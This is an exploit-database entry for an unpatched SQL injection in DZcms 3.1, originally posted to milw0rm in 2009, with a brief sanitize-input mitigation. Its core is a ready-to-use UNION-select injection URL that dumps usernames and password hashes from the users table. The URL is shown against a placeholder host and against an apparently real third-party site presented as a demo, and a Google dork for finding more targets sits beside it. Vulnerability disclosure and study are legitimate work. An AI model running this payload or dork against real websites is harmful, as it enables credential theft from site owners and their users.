header-logo
Suggest Exploit
vendor:
DZcms
by:
Glafkos Charalambous
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DZcms
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:cydezines:dzcms:3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

dzCMS SQL Injection Vulnerability

A SQL injection vulnerability exists in DZcms v.3.1, a content management system developed by CyDezines. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is triggered when an attacker sends a maliciously crafted HTTP request to the vulnerable application. The Google Dork “Powered by DZcms” can be used to identify vulnerable websites. A proof-of-concept (POC) is available at http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/* and a demo is available at http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*. The vulnerability was discovered by Glafkos Charalambous and was published on milw0rm.com on January 11, 2009.

Mitigation:

The vendor has not released a patch to address this vulnerability. As a workaround, users should ensure that all input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Application: DZcms v.3.1
Vendor Name: CyDezines
Vendor Url: http://www.cydezines.com
Bug Type: dzCMS SQL Injection Vulnerability
Exploitation: Remote
Severity: High
Solution Status: Unpatched
Google Dork: "Powered by DZcms"

POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Demo:
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*

Credits: Glafkos Charalambous
glafkos [at] astalavista [dot] com

# milw0rm.com [2009-01-11]